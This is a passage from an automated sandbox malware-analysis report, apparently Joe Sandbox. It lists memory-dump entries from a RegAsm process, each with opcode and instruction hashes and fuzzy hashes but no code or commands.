                                                                            • Opcode Fuzzy Hash: 42106f70411d8b8e71d610800173d2fc4e56ae32bf2d0e561b4d9250777ff22f
                                                                            • Instruction Fuzzy Hash: FBD05E6270512027469475AF688052FA6DEEBCD9A1750003EE61DC7740CE619C0643E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4605237261.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6d60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 54627ee3263c128f1f89dfc8fb1f23ecc7e95ddacbe9dc8a8a9cd3b557805073
                                                                            • Instruction ID: 0f15d9006b1a4b8bb28aa2726b6fc62663791633bcbe49b8ff81fc0de4b4adcb
                                                                            • Opcode Fuzzy Hash: 54627ee3263c128f1f89dfc8fb1f23ecc7e95ddacbe9dc8a8a9cd3b557805073
                                                                            • Instruction Fuzzy Hash: D9E0D872A0110AEFCB44CFF4DA45A6F7BB2EF80204700C568D509DB100EA31DE02D740
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4605237261.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6d60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be4658b1553b776df558cabebb31d18ee4910776ba9ae29b006d83882f8a2f45
                                                                            • Instruction ID: b60d506b6cf885b0447dee6430b798f1b38d962693e5d45aedc9950f198c0dfe
                                                                            • Opcode Fuzzy Hash: be4658b1553b776df558cabebb31d18ee4910776ba9ae29b006d83882f8a2f45
                                                                            • Instruction Fuzzy Hash: E3E0C276B01511CFC288E3ACD50459A7BDBDEC0211349D46AD20A9B741DEB5CC4283E0